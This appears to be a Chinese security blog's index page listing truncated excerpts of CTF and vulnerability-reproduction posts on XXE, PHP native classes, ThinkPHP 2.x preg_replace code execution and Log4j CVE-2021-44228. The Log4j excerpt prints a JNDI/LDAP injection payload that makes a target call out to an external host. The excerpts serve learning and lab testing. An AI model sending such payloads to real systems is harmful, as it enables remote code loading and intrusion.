摘要: xxe XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 参考链接 xxe漏洞学习 --时光不改 web373 <?php /* # -*- codin 阅读全文
posted @ 2022-06-17 11:59 森sen 阅读(819) 评论(0) 推荐(0) 编辑
摘要: ##记一道利用原生类的web题 利用的是ctfshow中的一道比赛题目 题目源码提示 <!--?source--> 访问进入 <?php error_reporting(0); if(isset($_GET['source'])){ highlight_file(__FILE__); echo "\ 阅读全文
posted @ 2022-06-17 11:43 森sen 阅读(36) 评论(0) 推荐(0) 编辑
摘要: Thinkphp2 参考链接: jammny 漏斗社区 漏洞详情: ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\ 阅读全文
posted @ 2022-06-17 11:31 森sen 阅读(47) 评论(0) 推荐(0) 编辑
摘要: log4j(CVE-2021-44228) 简单测试 先利用DNSlog测试是否存在该漏洞: 传入payload: url/admin/cores?action=${jndi:ldap://(获取到的dns域名)/exp} 回到dnslog查看是否有解析记录 证明漏洞存在! 漏洞复现 工具地址: h 阅读全文
posted @ 2022-06-17 11:23 森sen 阅读(412) 评论(0) 推荐(0) 编辑